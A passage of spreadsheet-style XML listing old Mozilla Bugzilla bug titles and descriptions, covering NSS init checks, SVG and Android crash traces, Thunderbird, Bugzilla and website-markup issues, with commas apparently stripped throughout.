    <t>Many NSS commands do not detect failure of NSS_Init* functions</t>
  </si>
  <si>
    <t>Recently all the commands in NSS were converted to use NSS's official 
initialization functions e.g. NSS_Init NSS_InitReadWrite NSS_Initialize
NSS_NoDB_Init etc.  But many of the NSS commands do not check the 
value returned by those functions to see if they succeeded or not.
Every NSS command must check the return value of the NSS initialization
function to detect failure and must output an appropriate error message
and stop if the initialization function failed.
Here is a list of NSS commands that fail to check the return value from
the NSS initialization function:
cmd/certcgi/certcgi.c:    NSS_InitReadWrite(DBdir)
cmd/certutil/certutil.c:    NSS_Initialize(SECU_ConfigDirectory(NULL)
cmd/crlutil/crlutil.c:    NSS_InitReadWrite(SECU_ConfigDirectory(NULL))
cmd/modutil/modutil.c:  NSS_Initialize(SECU_ConfigDirectory(NULL) dbprefix
cmd/p7content/p7content.c:    NSS_Init(SECU_ConfigDirectory(NULL))
cmd/p7env/p7env.c:    NSS_Init(SECU_ConfigDirectory(NULL))
cmd/p7sign/p7sign.c:    NSS_Init(SECU_ConfigDirectory(NULL))
cmd/p7verify/p7verify.c:    NSS_Init(SECU_ConfigDirectory(NULL))
cmd/pk12util/pk12util.c:    NSS_InitReadWrite(dir)
cmd/signtool/util.c:               NSS_Init(cert_dir)
cmd/signtool/util.c:                NSS_InitReadWrite(cert_dir)
cmd/signver/signver.c:  NSS_Init(SECU_ConfigDirectory(NULL))
cmd/bltest/blapitest.c:    NSS_NoDB_Init(NULL)
cmd/derdump/derdump.c:    NSS_NoDB_Init(NULL)  /* XXX */</t>
  </si>
  <si>
    <t>CORE-108486</t>
  </si>
  <si>
    <t>XUL images should fire onload</t>
  </si>
  <si>
    <t>Just an oversight we missed.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-342174</t>
  </si>
  <si>
    <t>Need information about server/database administration/backup/restore</t>
  </si>
  <si>
    <t>The servers and databases at mozilla.org (bugzilla cvs wikis mozilla.org web site) are very important for my group at Red Hat which includes some of the nspr nss ldap c sdk and other mozilla components.  Due to a recent failure in another important site (bugzilla.redhat.com) we are documenting the backup restore and data retention policies and procedures for the servers upon which we depend.  Under the mozilla.org umbrella this includes the following sites both for server availability/failover and for the actual data (source code html pages databases) server by those sites:
www.mozilla.org
wiki.mozilla.org
developer.mozilla.org
cvs.mozilla.org
lxr.mozilla.org
bugzilla.mozilla.org</t>
  </si>
  <si>
    <t>CORE-52572</t>
  </si>
  <si>
    <t>Mozilla DOML2 not in sync with the DOM Level 2 PR.</t>
  </si>
  <si>
    <t>Just resently the DOM WG made some last minute changes to the DOM Level 2 spec
that made mozillas DOM interface be different than the ones in the current DOM
Level 2 PR. There changes are trivial and I even have a fix in my tree ready to
go in.</t>
  </si>
  <si>
    <t>SEAMONKEY-408358</t>
  </si>
  <si>
    <t>Drop emOverlay.xul</t>
  </si>
  <si>
    <t>Created attachment 293127
The fix
We created emOverlay.xul during the transitional phase from xpfe to toolkit. We don't need it now so we should drop it. Functions are moving back into tasksOverlay.js (replacing old ones where appropriate) and xul is moving back to tasksOverlay.xul. No locale changes necessary.</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-334783</t>
  </si>
  <si>
    <t>handle SSL cert mismatches</t>
  </si>
  <si>
    <t>Normally SSL warning dialogs are presented to the user but in the case of the metrics service it needs to proceed in the background without user intervention.  This requires hooking up our own BadCertListener.  For the most common type of mismatch (different hostname) we should also provide a pref that can automatically accept an expected alternate name.</t>
  </si>
  <si>
    <t>CORE-313498</t>
  </si>
  <si>
    <t>[FIX]nsListControlFrame::GetOptionsContainer shouldn't take prescontext</t>
  </si>
  <si>
    <t>It never uses it.</t>
  </si>
  <si>
    <t>CORE-392338</t>
  </si>
  <si>
    <t>[FIX]Request created via document.load causes Component does not have requested interface arg 0 [nsIHttpChannel.notificationCallbacks]</t>
  </si>
  <si>
    <t>This is somewhat similar to bug 317448. The difference is that instead of creating the request via
XMLHTTPRequest it is created via document.implementation.createDocument. Any a request for an XML
document is created but when we try to access channel.notificationCallbacks (for example in 
http-on-modify-request observer) we get:
Component does not have requested interface arg 0 [nsIHttpChannel.notificationCallbacks]</t>
  </si>
  <si>
    <t>SEAMONKEY-33322</t>
  </si>
  <si>
    <t>More bug fixes.</t>
  </si>
  <si>
    <t>Well I got bored this weekend and I looked at ALL the compiler
warnings produced with gcc under Linux.  I fixed the ones I felt safe
fixing and I left the rest alone.  The ones I left alone were either:
   1) Possible bugs that I did not know how to fix
   2) Difficult for me to deduce the desired behavior
   3) Potentially useful when running the debugger
   4) Not sure if the original author would appreciate the change
I tried not to make drastic changes to other peoples code because I do
not like it when people do that to me.
I would like people to look at these changes before I check them in
both to make sure that they dont break anything and to make sure that
its OK with the module owners.  To facilitate this I have created a
b_jlnance_warnings_01 branch off the HEAD and checked the fixes into
that branch.  Among other things this will allow module owners to
edit my changes before I check them in if they wish to do so.
I am attaching a patch to this bug report and the list of the files I
have changed is:
dom/src/html/nsJSHTMLFormElement.cpp
dom/src/html/nsJSHTMLSelectElement.cpp
editor/base/nsHTMLEditRules.cpp
editor/base/nsHTMLEditor.cpp
extensions/cookie/nsCookie.cpp
extensions/wallet/src/singsign.cpp
extensions/wallet/src/wallet.cpp
gfx/src/nsImageNetContextAsync.cpp
gfx/src/gtk/nsFontMetricsGTK.h
gfx/src/gtk/nsGCCache.h
gfx/src/gtk/nsGfxFactoryGTK.cpp
htmlparser/src/CNavDTD.cpp
htmlparser/src/nsHTMLContentSinkStream.cpp
layout/html/base/src/nsBlockFrame.cpp
layout/html/base/src/nsFrame.cpp
layout/html/base/src/nsGfxScrollFrame.cpp
layout/html/base/src/nsTextFrame.cpp
layout/html/content/src/nsHTMLBodyElement.cpp
layout/html/document/src/nsFrameSetFrame.cpp
layout/html/forms/src/nsComboboxControlFrame.cpp
layout/html/forms/src/nsListControlFrame.cpp
layout/html/style/src/nsCSSDeclaration.cpp
layout/html/style/src/nsCSSFrameConstructor.cpp
layout/html/style/src/nsCSSParser.cpp
layout/html/table/src/nsCellMap.cpp
layout/html/table/src/nsTableCellFrame.cpp
layout/html/table/src/nsTableFrame.cpp
layout/xul/base/src/nsMenuBarFrame.cpp
layout/xul/base/src/nsMenuFrame.cpp
layout/xul/base/src/nsSplitterFrame.cpp
layout/xul/base/src/nsTreeFrame.cpp
layout/xul/base/src/nsTreeOuterFrame.cpp
layout/xul/base/src/nsXULTextFrame.cpp
mailnews/base/util/nsMsgFolder.cpp
modules/oji/src/jvmmgr.cpp
modules/oji/src/lcglue.cpp
modules/oji/src/nsJVMManager.cpp
netwerk/base/src/nsSocketTransport.cpp
netwerk/cache/filecache/nsNetDiskCache.cpp
netwerk/protocol/http/src/nsHTTPRequest.cpp
netwerk/streamconv/converters/nsHTTPCompressConv.cpp
rdf/base/src/nsRDFParserUtils.cpp
rdf/chrome/src/nsChromeRegistry.cpp
rdf/content/src/nsXULDocument.cpp
uriloader/base/nsURILoader.cpp
xpcom/ds/nsTextFormatter.cpp
xpcom/proxy/src/nsProxyEvent.cpp
xpinstall/src/nsLoggingProgressNotifier.cpp</t>
  </si>
  <si>
    <t>CORE-361745</t>
  </si>
  <si>
    <t>svg viewbox=twisted and image {widthheightxy}=twisted [@ memset - fbRasterizeTrapezoid]</t>
  </si>
  <si>
    <t>svg viewbox=twisted and image {widthheightxy}=twisted cause crash in memset
on macosx ppc 2.0 branch. trunk complains about not being able to allocate
memory.
may be related to Bug 358767
2.0-latest crashes badly
Program received signal EXC_BAD_ACCESS Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x05b91000
0xffff9068 in ___memset_pattern () at
/System/Library/Frameworks/System.framework/PrivateHeaders/ppc/cpu_capabilities.h:193
193
/System/Library/Frameworks/System.framework/PrivateHeaders/ppc/cpu_capabilities.h:
No such file or directory.
        in
/System/Library/Frameworks/System.framework/PrivateHeaders/ppc/cpu_capabilities.h
(gdb) bt 
#0  0xffff9068 in ___memset_pattern () at
/System/Library/Frameworks/System.framework/PrivateHeaders/ppc/cpu_capabilities.h:193
#1  0x90129b30 in memset ()
#2  0x008befd4 in fbRasterizeTrapezoid ()
#3  0x007e3074 in _cairo_pixman_add_trapezoids ()
#4  0x00582e54 in _cairo_image_surface_assume_ownership_of_data ()
#5  0x005a17c0 in _cairo_surface_composite_trapezoids ()
#6  0x008bbe9c in _cairo_clip_combine_to_surface ()
#7  0x008bc000 in _cairo_clip_clip ()
#8  0x0059e260 in cairo_clip_preserve ()
#9  0x0059e21c in cairo_clip ()
#10 0x0057d254 in nsSVGCairoCanvas::SetClipRect ()
#11 0x007225fc in nsSVGImageFrame::PaintSVG ()
#12 0x006dd744 in nsSVGGFrame::PaintSVG ()
#13 0x0075c9cc in nsSVGOuterSVGFrame::Paint ()
#14 0x004c29b8 in nsContainerFrame::PaintChild ()
#15 0x004c2868 in nsContainerFrame::PaintChildren ()
#16 0x00596ed0 in nsHTMLContainerFrame::Paint ()
#17 0x006f874c in CanvasFrame::Paint ()
#18 0x00151040 in PresShell::Paint ()
#19 0x004eb70c in nsView::Paint ()
#20 0x001fafe8 in nsViewManager::RenderDisplayListElement ()
#21 0x001fa8f0 in nsViewManager::RenderViews ()
#22 0x001f9740 in nsViewManager::Refresh ()
#23 0x001fc5fc in nsViewManager::DispatchEvent ()
#24 0x004eb2f8 in ViewWrapper::GetInterface ()
#25 0x006172f0 in nsWindow::DispatchEvent ()
trunk can't allocate memory:
firefox-bin(6730xa000ed88) malloc: *** vm_allocate(size=2639417344) failed
(error code=3)
firefox-bin(6730xa000ed88) malloc: *** error: can't allocate region
firefox-bin(6730xa000ed88) malloc: *** set a breakpoint in szone_error to
debug
firefox-bin(6730xa000ed88) malloc: *** vm_allocate(size=2639417344) failed
(error code=3)
firefox-bin(6730xa000ed88) malloc: *** error: can't allocate region
firefox-bin(6730xa000ed88) malloc: *** set a breakpoint in szone_error to
debug</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-479905</t>
  </si>
  <si>
    <t>Create an extensible IRC bot that watches the unit tests</t>
  </si>
  <si>
    <t>We've talked about this plenty but we should have a bug to track it.
Basically we want an IRC bot to watch /tests/ on preview.amo and complain when they break.  It should idle in #amo.  We can add other useful things at some point as long as it doesn't start flooding the channel like the old days.
I've asked Wolf if there are some scripts we can use and/or modify for firebot to do this for us.  I'll reply here with what he says.  Or I'll find his bugmail..</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-352276</t>
  </si>
  <si>
    <t>Make /seamonkey/ validate and meets style guidelines and markup guidelines</t>
  </si>
  <si>
    <t>Robert
Since you are webpages maintainer of seamonkey directory and since you expressed the request of being explained changes in advance in a bugfile...
http://www.mozilla.org/projects/seamonkey/brownbag.html (3 errors no doctype decl 13 errors with strict DTD)
http://www.mozilla.org/projects/seamonkey/news.html (1 error no width and height defined for images no rel used for intra-project navigation so no site navigation toolbar usable no relative referencing of links
http://www.mozilla.org/contribute/writing/guidelines#linking
Use relative links whenever practical.
http://www.mozilla.org/contribute/writing/guidelines#linking
Anchors should not be empty.
Defining image width and height helps speed up rendering as the browser knows how much space to allocate a particular area (image placeholder) while parsing and rendering the page. Otherwise the browser has to wait until the graphic is loaded before it knows where to put anything below or to the right of the graphic. The browser may need to rearrange the page as the images are downloaded. When it does the visitor sees a reflow a shift in the page layout. It's generally widely acknowledged among expert web authors book authors that defining width and height attributes of image is the correct thing to do.
http://www.mozilla.org/projects/seamonkey/milestones/50m5plan.html (49 errors 23 warnings with a transitional DTD 54 errors with a strict DTD lots of ) Maybe this document should be removed.
http://www.mozilla.org/projects/seamonkey/milestones/50m6plan.html (48 errors 23 warnings with a transitional DTD 47 errors with a strict DTD 257  90  maybe this document should be removed.
http://www.mozilla.org/projects/seamonkey/milestones/index.html (53 errors with a transitional DTD 99 errors with a strict DTD lots of    bgcolor nosave (!) deeply nested lists etc. Maybe this document should be removed.
http://www.mozilla.org/projects/seamonkey/release-notes/index.html (21 errors with a transitional DTD 24 errors with a strict DTD)
http://www.mozilla.org/projects/seamonkey/milestones/m3.html (5 errors with a transitional DTD 8 errors with a strict DTD). This document looks like an informal internal document. Maybe this document should be removed.
http://www.mozilla.org/projects/seamonkey/milestones/neck-sched.html Maybe this document should be removed.
http://www.mozilla.org/projects/seamonkey/milestones/progress-2-beta.html (107 errors) Maybe this document should be removed.
http://www.mozilla.org/projects/seamonkey/release-notes/m3portnotes.html Maybe this document should be removed.
http://www.mozilla.org/projects/seamonkey/release-notes/m4.html Maybe this document should be removed.
http://www.mozilla.org/projects/seamonkey/release-notes/m5.html Maybe this document should be removed.
http://www.mozilla.org/projects/seamonkey/release-notes/m6.html Maybe this document should be removed.
http://www.mozilla.org/projects/seamonkey/release-notes/m7.html Maybe this document should be removed.
http://www.mozilla.org/projects/seamonkey/release-notes/m8-5.html Maybe this document should be removed.
http://www.mozilla.org/projects/seamonkey/release-notes/m8.html Maybe this document should be removed.
http://www.mozilla.org/projects/seamonkey/release-notes/m9.html Maybe this document should be removed.
http://www.mozilla.org/projects/seamonkey/release-notes/m12.html (46 errors 12 warnings) Maybe this document should be removed.
http://www.mozilla.org/projects/seamonkey/release-notes/M15-detail.html (27 errors with a transitional DTD 100 errors with a strict DTD document even uses invalid characters )
http://www.mozilla.org/projects/seamonkey/release-notes/rnguide.html Maybe this document should be removed.
http://www.mozilla.org/projects/seamonkey/releases/1.0a.html (2 errors
is it possible that there might be an already defined class in content.css or in cavendish/content.css which could be used instead of an inline style for that warning section? Just asking.
This is how the document styles dt: with an embedding .
Linux (x86)
Now this is how the stylesheet http://www.mozilla.org/css/base/content.css
styles dt:
	dt {
		font-weight: bold
	}
http://www.mozilla.org/projects/seamonkey/releases/seamonkey1.0a/README.html
http://www.mozilla.org/projects/seamonkey/releases/seamonkey1.0a/changelog.html
http://www.mozilla.org/projects/seamonkey/releases/seamonkey1.0a/installation.html
http://www.mozilla.org/projects/seamonkey/releases/seamonkey1.0a/known-issues.html
http://www.mozilla.org/projects/seamonkey/releases/seamonkey1.0b/README.html
http://www.mozilla.org/projects/seamonkey/releases/seamonkey1.0b/changelog.html
http://www.mozilla.org/projects/seamonkey/releases/seamonkey1.0b/installation.html
http://www.mozilla.org/projects/seamonkey/releases/seamonkey1.0b/known-issues.html
http://www.mozilla.org/projects/seamonkey/releases/seamonkey1.0/README.html
http://www.mozilla.org/projects/seamonkey/releases/seamonkey1.0/changelog.html
http://www.mozilla.org/projects/seamonkey/releases/seamonkey1.0/installation.html
http://www.mozilla.org/projects/seamonkey/releases/1.0b.html (see the comments on 1.0a.html for the exact same issues)
http://www.mozilla.org/projects/seamonkey/reports/ns6b2analysis.html (empty!)
http://www.mozilla.org/projects/seamonkey/rules/shipping-rules.html (humor)
http://www.mozilla.org/projects/seamonkey/rules/tree-hints.html (7 years old document!)</t>
  </si>
  <si>
    <t>CALENDAR-330121</t>
  </si>
  <si>
    <t>datepickers &amp; export code not usable in Lightning on Japanese Win2k</t>
  </si>
  <si>
    <t>This is due to the fact that the fix for bug 307895 is has not landed in any 1.5.* builds.  Bug 92174 is pretty likely to fix this for the datepicker code if not we could move to nsIScriptableDateFormat.  The export code will need some changes.</t>
  </si>
  <si>
    <t>SEAMONKEY-522023</t>
  </si>
  <si>
    <t>Use a better globe icon in the taskbar</t>
  </si>
  <si>
    <t>As discussed in mozilla.dev.apps.seamonkey (thread icon size in status bar) least in the classic theme the icon for the browser component is hardly discernible as a globe which should be taken as a metaphor for the web.
Even at a size of 16x16 something like a globe should be visible. The same globe needs to be used at even smaller size in the composer icon.</t>
  </si>
  <si>
    <t>frgrahl</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-389909</t>
  </si>
  <si>
    <t>Project change for NSS trunk stuff breaks srcdir builds</t>
  </si>
  <si>
    <t>Created attachment 274229
grab libnssdbm3.dylib from dist/lib
Peter reported a build failure on copying libnssdbm3.dylib once he updated his tree.
Turns out he's using a srcdir build so all the file locations are different and such and the project references ../nss/nssdbm/libnssdbm3.dylib instead of a dist/lib or dist/Embed location (my guess is this was Xcode resolving the symlink from dist/lib when Stuart added this for his 3rd bustage fix of the day).
This should fix srcdir builds going forward.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-503584</t>
  </si>
  <si>
    <t>Need to find an EVCert site whose identifier truncates in Larry on all platforms</t>
  </si>
  <si>
    <t>This is a tracking bug for QA (myself Juan and kbrosnan) to find a test URL.
Here is the test case the purpose of which is to verify the site identifier (text that appears in the favicon box) truncates when it is over a certain length:
https://litmus.mozilla.org/show_test.cgi?id=7816
The current test URL truncates on Mac and Linux only because the font size is smaller on Windows.  Hence the text is able to fit within the bounds of the Windows favicon box without truncating.
We need to find a test URL which has a site identifier &gt;50 characters.</t>
  </si>
  <si>
    <t>CORE-183153</t>
  </si>
  <si>
    <t>MaiTopLevel object should be destoryed in the XPCOM way</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID-814886</t>
  </si>
  <si>
    <t>java.lang.IllegalArgumentException: invalid selection offsets at org.mozilla.gecko.GeckoEditable$Action.newSetSelection(GeckoEditable.java)</t>
  </si>
  <si>
    <t>There's one crash in 20.0a1/20121124: bp-44ca043e-e26a-4766-866b-75b952121124.
java.lang.IllegalArgumentException: invalid selection offsets
	at org.mozilla.gecko.GeckoEditable$Action.newSetSelection(GeckoEditable.java:131)
	at org.mozilla.gecko.GeckoEditable.setSpan(GeckoEditable.java:682)
	at java.lang.reflect.Method.invokeNative(Native Method)
	at java.lang.reflect.Method.invoke(Method.java:511)
	at org.mozilla.gecko.GeckoEditable.invoke(GeckoEditable.java:630)
	at $Proxy0.setSpan(Native Method)
	at android.text.Selection.setSelection(Selection.java:78)
	at android.view.inputmethod.BaseInputConnection.setSelection(BaseInputConnection.java:487)
	at com.android.internal.view.IInputConnectionWrapper.executeMessage(IInputConnectionWrapper.java:288)
	at com.android.internal.view.IInputConnectionWrapper$MyHandler.handleMessage(IInputConnectionWrapper.java:77)
	at android.os.Handler.dispatchMessage(Handler.java:99)
	at android.os.Looper.loop(Looper.java:137)
	at android.app.ActivityThread.main(ActivityThread.java:4447)
	at java.lang.reflect.Method.invokeNative(Native Method)
	at java.lang.reflect.Method.invoke(Method.java:511)
	at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:784)
	at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:551)
	at dalvik.system.NativeStart.main(Native Method)
More reports at:
https://crash-stats.mozilla.com/report/list?signature=java.lang.IllegalArgumentException%3A+invalid+selection+offsets+at+org.mozilla.gecko.GeckoEditable%24Action.newSetSelection%28GeckoEditable.java%29</t>
  </si>
  <si>
    <t>scoobidiver</t>
  </si>
  <si>
    <t>THUNDERBIRD-392670</t>
  </si>
  <si>
    <t>Add toolkit download manager pref for displayed history days</t>
  </si>
  <si>
    <t>Created attachment 277171
v1
Bug 392362 added a new download manager pref which it expects to be set by default
browser.download.manager.displayedHistoryDays</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-460459</t>
  </si>
  <si>
    <t>Create drupal-mollom package</t>
  </si>
  <si>
    <t>http://drupal.org/project/mollom  6.x-1.5</t>
  </si>
  <si>
    <t>THUNDERBIRD-307788</t>
  </si>
  <si>
    <t>if Kerberos tickets don't exist when launching T-Bird get Krb Ticket Manager to prompt for them</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.10) Gecko/20050716 Firefox/1.0.6
Build Identifier: 1.6a1 (20050908)
THANKS for getting the Kerberos / GSSAPI mail enhancements into Mozilla.  
The #1 comment I've been hearing from people testing out these excellent changes
is that: if Kerberos credentials don't exist (or are expired) the user is
expecting Thunderbird to bring up the Kerberos Ticket Manager to prompt for the
Kerberos password to generate new tickets.  
Every other mail client that does GSSAPI does this.  TBird should as well.  
One way to fix this problem is to back the change from bug 240643 out (look for
the lines in nsAuthGSSAPI.cpp) but this would certainly reintroduce the problem
that particular patch fixed.  Another possible solution would be to only apply
the bug 240643 patch if mServiceName did not start with the prefix of smtp@
imap@ and pop@.  There are other possible solutions and I'm willing and
eager to write a patch.
Reproducible: Always
Steps to Reproduce:
This assumes you have a mail server that knows how to authenticate the GSSAPI way.
1.  Make sure the Kerberos ticket cache is clear.
2.  Launch Thunderbird.
2.  Connect to any of your GSSAPI-configured mail servers.
3.
Actual Results:  
you'll get the standard Thunderbird Password? popup alert.
Expected Results:  
The Kerberos Ticket Manager should automatically pop up requesting for the user
to type in their Kerberos password (which generates the tickes that Thunderbird
needs to access the mail servers).</t>
  </si>
  <si>
    <t>dautermann</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-408092</t>
  </si>
  <si>
    <t>pa-IN / Punjabi</t>
  </si>
  <si>
    <t>Crash Reporter window is missing text for Include URL in crash report</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.4 en-US rv:1.9b2) Gecko/2007121014 Firefox/3.0b2
Build Identifier: 
The crash reporter window is missing the dialog next to the checkbox that should say Include the URL in the crash report.   Instead there is a ? there next to the checkbox.   
See screenshot in the URL.
Reproducible: Always
Steps to Reproduce:
1. Download pa-IN for fx3 beta 2 build
2. force the browser to crash.  Use the testcase in bug 378521 if needed.
3. Open crash reporter. verify the dialog is missing a localized string.  
Actual Results:  
Missing string for Include the URL in the crash report
Expected Results:  
String should be localized.</t>
  </si>
  <si>
    <t>FIREFOX-354215</t>
  </si>
  <si>
    <t>Reel New Media Toolbar extension not compatable with Firefox 2</t>
  </si>
  <si>
    <t>https://addons.mozilla.org/firefox/1520</t>
  </si>
  <si>
    <t>roula</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-518097</t>
  </si>
  <si>
    <t>Interrupted upload of new Add-On makes it impossible to upload this Add-On again</t>
  </si>
  <si>
    <t>I tried to upload a new Add-On which failed (transfer never ended).
After this I try again but get an error:
This Add-on-ID (popmaillistrecipients@funke.de) already exists ... maybe you want to upload a new version [https://addons.mozilla.org/de/firefox/developers/versions/add/]
As you can see there is no Add-On number attached but the ID is still blocked.
How can one recover from this?</t>
  </si>
  <si>
    <t>giermann</t>
  </si>
  <si>
    <t>BUGZILLA-181396</t>
  </si>
  <si>
    <t>boolean chart query for flag equal to review+ AND flag equal to superreview+ returns bad results</t>
  </si>
  <si>
    <t>(note: bmo specific flags)
A query for
flag equal to review+ 
AND 
flag equal to superreview+
in the boolean chart should show me all of the bugs with at least one attachment
which has both review and superreview. Instead it returns no results. I think
it's  returning results for something like a single flag with both review+ and
superreview+ flags which can't exist.
A query for: 
flag equal to review+
new chart
flag equal to superreview+
returns bugs with an attachment which has both flags and the less desirable (for
my purposes) bugs with two attachments each having one of the two flags.</t>
  </si>
  <si>
    <t>TESTING-370028</t>
  </si>
  <si>
    <t>Unbuffer stdout in xpcshell so that its output during unit tests is in execution order</t>
  </si>
  <si>
    <t>Created attachment 254703
Unbuffer it
The output from failed unit tests is mixed together because stdout is buffered.  Unmixing it aids in test log clarity both in tinderbox output and in logs a developer might read while debugging a patch.</t>
  </si>
  <si>
    <t>CORE-267650</t>
  </si>
  <si>
    <t>crash if  is stroked and has fill='none'</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.3) Gecko/20041026 Firefox/1.0RC1
Build Identifier: mozilla/5.0/ (windows U win98 en-US rv:1.8a5) gecko/20041031
This program has performed an illegal operation
Mozilla caused an invalid page fault in module gklayout.dll at 0167:01cf8ed8.
Registers
.....
Bytes
...
Stack Dump
...
Reproducible: Always
Steps to Reproduce:
1.load graphic in latest win version MozSVG
2.
3.
Actual Results:  
application crashes
Expected Results:  
graphic loads
http://www.schepers.cc/BAM/index.html also crashes it has a link to the SVG
graphic:
   &lt;iframe src=DAS-Vectoreal-Logo.svg height=48 width=72
frameborder='0'&gt;Logo: Douglas Alan Schepers Vectoreal</t>
  </si>
  <si>
    <t>THUNDERBIRD-241389</t>
  </si>
  <si>
    <t>Address book is empty</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7b) Gecko/20040408 Firefox/0.8.0+ (daihard: XFT+GTK2 opt. for P4/SSE-2)
Build Identifier: Mozilla Thunderbird 0.6+ (20040422)
When opening the address book it is empty no seaches (even LDAP) work at all.
Reproducible: Always
Steps to Reproduce:
1. Start Thunderbird
2. Click on Address Book icon
3.
Actual Results:  
No contacts in address book
Expected Results:  
There should be lots of contacts and LDAP searches should work also</t>
  </si>
  <si>
    <t>TESTOPIA-455729</t>
  </si>
  <si>
    <t>Would love the ability to add attachments to a run</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
In our organization we are often asked for additional test evidence within a run. For example we may need to provide screen shots for test case results within a run.
We can't add them to a case because they would be available for that case across runs. For this reason it would be nice to be able to upload attachments specific to a run that would show external test evidence.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-259705</t>
  </si>
  <si>
    <t>RSS account name should be localizable through a .dtd file</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040802 Firefox/0.9.1+ (Pitreck)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040802 Firefox/0.9.1+ (Pitreck)
One more bug for keep localizable strings in en-US(-mail).jar list. The
following strings can be translated only through two rss.rdf files one placed
in the thunderbird/defaults/isp second in the thunderbird/defaults/isp/US:
Please make us localizators life easier and put those strings in some .dtd file. 
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>gorky</t>
  </si>
  <si>
    <t>THUNDERBIRD-490141</t>
  </si>
  <si>
    <t>[autoconfig] doesn't start detection from my suggested server settings</t>
  </si>
  <si>
    <t>Autoconfig doesn't detect my server address correctly (because its too far fetched from my email address) therefore I stopped autoconfig and entered my server hostname. I also selected the connection type as None.
I then clicked Go and autoconfig started from SSL/TLS on port 993 rather than none on 143 as was entered in the configuration by myself.</t>
  </si>
  <si>
    <t>bwinton</t>
  </si>
  <si>
    <t>CORE-211961</t>
  </si>
  <si>
    <t>Folders and files with non-latin characters don't show up</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.4) Gecko/20030624
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.4) Gecko/20030624
I have a folder which contains files and folders whoes name contain non-latin
characters such as cyrillic and chinse idiograms. Browsing this folder with the
file:// protocol I only see the files with latin characters. I should also note
that the file:// protocol appears to be insisting on displaying in cp1225. This
is an issue since Windows stores long file names in UTF8. This is observed with
the release version of 1.4 and I am certain it effects previous version. I can
not confirm whether this issue affects other platforms.
Reproducible: Always
Steps to Reproduce:
1. Ensure that all possible languages are checked in the regional-options
control panel. 
2. Create folder containing files with name using non-latin characters such as
cyrillic - you can use 'character map' to help you.
3. Browse the folder and see the results.
Actual Results:  
As described in the details above.
Expected Results:  
A) displayed the page in UTF8
B) displayed ALL the files and folders in the directory</t>
  </si>
  <si>
    <t>andrejohn.mas</t>
  </si>
  <si>
    <t>CORE-517163</t>
  </si>
  <si>
    <t>[Flashblock] Unexpected error = NS_ERROR_UNEXPECTED @ return Components.lookupMethod(untrustedObject methodName).apply(untrustedObject arguments)</t>
  </si>
  <si>
    <t>[please move to a more appropriate bugzilla component]
Flashblock stops working in the latest Minefield nightlies.
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.3a1pre) Gecko/20090916 Minefield/3.7a1pre
Flashblock 1.5.11.2
Error: Unexpected error = NS_ERROR_UNEXPECTED
Source file: chrome://flashblock/content/flashblock.xml
Line: 21
Line 21 is: return fun.apply(untrustedObject arguments)
Code:
//From Jesse's XPCNativeWrapper: http://mavra.perilith.com/~luser/content/native.js
function nativeMethod(untrustedObject methodName)
{
  // happier stack traces and faster multiple calls
  var fun = Components.lookupMethod(untrustedObject methodName)
  return function()
  {
    return fun.apply(untrustedObject arguments)
  }
}</t>
  </si>
  <si>
    <t>SEAMONKEY-220820</t>
  </si>
  <si>
    <t>Make preprocessor.pl substitution filter fail on undefined variables</t>
  </si>
  <si>
    <t>BUGZILLA-140332</t>
  </si>
  <si>
    <t>versioncache needs to be deleted on bug status changes</t>
  </si>
  <si>
    <t>OVERVIEW DESCRIPTION
the $BUGZILLA_HOME/data/versioncache file needs to be deleted if you modify the
bug status (and probably the resolutions) enumeration within the mysql database
to show immediate results.
STEPS TO REPRODUCE
follow the description at http://www.bugzilla.org/docs/html/dbdoc.html in
section  2.1.1 bugzilla database tables
ACTUAL RESULTS
the updated/modified enumeration presented in the mysql database doesn't show up
in the web interface
EXPECTED RESULTS
the updated/modified enumeration presented in the mysql database can be used in
the web interface
BUILD DATE &amp; PLATFORM
(not relevant for documentation component)
ADDITIONAL BUILDS AND PLATFORMS
(not relevant for documentation component)
ADDITIONAL INFORMATION
a checkout of the bugzilla project at Fri Apr 26 18:22:03 CEST 2002 still
contains the documentation without the note to delete the
$BUGZILLA_HOME/data/versioncache file
the fact that bugzilla optimizes database lookups by storing static information
in the $BUGZILLA_HOME/data/versioncache file is already documented in the
bugzilla guide at http://www.bugzilla.org/docs/html/geninstall.html in section
3.5.1 modifying your running system.
probably adding a paragraph similar to the following would be sufficient (this
should undergo a proof reading since i am not a native speaker):
make sure your bugzilla installation uses the modified values directly from the
